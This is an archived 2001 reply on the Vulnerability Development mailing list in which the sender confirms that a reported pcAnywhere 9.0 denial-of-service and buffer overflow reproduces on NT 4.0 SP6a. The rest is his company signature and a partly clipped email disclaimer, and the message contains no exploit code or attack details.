Vulnerability Development mailing list archives

Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow

From: Shashi Dookhee <shashi () TRAFFIC CO UK>
Date: Thu, 15 Feb 2001 01:47:10 +0000

I was able to verify this overflow on NT 4.0, with Service Pack 6a.

Thanks

Shashi Dookhee
Head of IT Infrastructure

e-mail:  shashi () traffic co uk

http://www.traffic.co.uk

Traffic Interactive Limited
191 Old Marylebone Road
London NW1 5DW

Telephone (Direct Line):        +44 (0)20 7298 8222
Telephone (Switchboard):     +44 (0)20 7298 8200
Facsimile:     +44 (0)20 7298 8201
ISDN:     +44 (0)20 7298 8299
Traffic Interactive is a full service new media agency helping clients
maximise their brand communications across all interactive digital
platforms.

We offer, consultancy, strategic development, web site design, production
& programming, on-line marketing & advertising.
you are not the addressee indicated in the message (or responsible for
the delivery of the message to such person), you may not copy or deliver
this message to anyone.

In such case, you should destroy this message and kindly notify the
sender by reply e-mail. Please advise immediately if you or your employer
does not consent to Internet e-mail for messages of this kind.

relate to the official business of Traffic Interactive Limited shall be
understood as neither given nor endorsed by them.

Traffic Interactive Limited.
Registered in England.
Registered Number 3164767.